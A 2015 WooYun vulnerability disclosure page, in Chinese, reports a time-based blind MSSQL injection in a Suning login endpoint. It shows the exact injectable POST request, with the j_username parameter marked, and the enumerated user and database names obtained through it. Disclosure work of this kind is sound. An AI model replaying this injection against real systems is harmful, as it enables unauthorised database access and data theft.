当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090490

漏洞标题:苏宁某系统MSSQL注射

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: lijiejie

提交时间:2015-01-07 14:59

修复时间:2015-01-12 15:00

公开时间:2015-01-12 15:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-07: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

苏宁某系统MSSQL注射, time blind.

详细说明:

该系统已被提报过一次: WooYun: 苏宁某系统登录处SQL注射漏洞
但注射的问题依然存在。注射点:

POST /j_acegi_security_check HTTP/1.1
Content-Length: 242
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ewp.suning.com.cn
Cookie: brfmisac=1
Host: ewp.suning.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
dynamicpass=aaa&encData=&ip=123.123.123.123&isdx=0&isIP=1&isusb=1&j_password=test&j_username=aaa*&needauthcode=0&rememberme=1&rndData=123426207127543&sendpass=1&uname=aaaa


参数j_username可注入。MSSQL time blind.

漏洞证明:

web application technology: JSP
back-end DBMS: Microsoft SQL Server 2012
current user: 'eweaver'
available databases [8]:
[*] master
[*] model
[*] msdb
[*] MysoftPerfAnalysis
[*] MysoftReport
[*] mysoftrtsTempDB
[*] SN_EWP
[*] tempdb

修复方案:

过滤,转义

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-12 15:00

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-07 15:03 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    不可能 这绝对不是lijiejielijiejie应该有付脚本

  2. 2015-01-07 15:16 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2210 漏洞数:294 | Just for fun.)

    @子非海绵宝宝 (此处应该附脚本)。。。 哈哈

  3. 2015-01-07 15:18 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @lijiejie 说把 你哪位...

  4. 2015-01-08 00:38 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    没附脚本!肯定是有人盗用了李姐姐的号。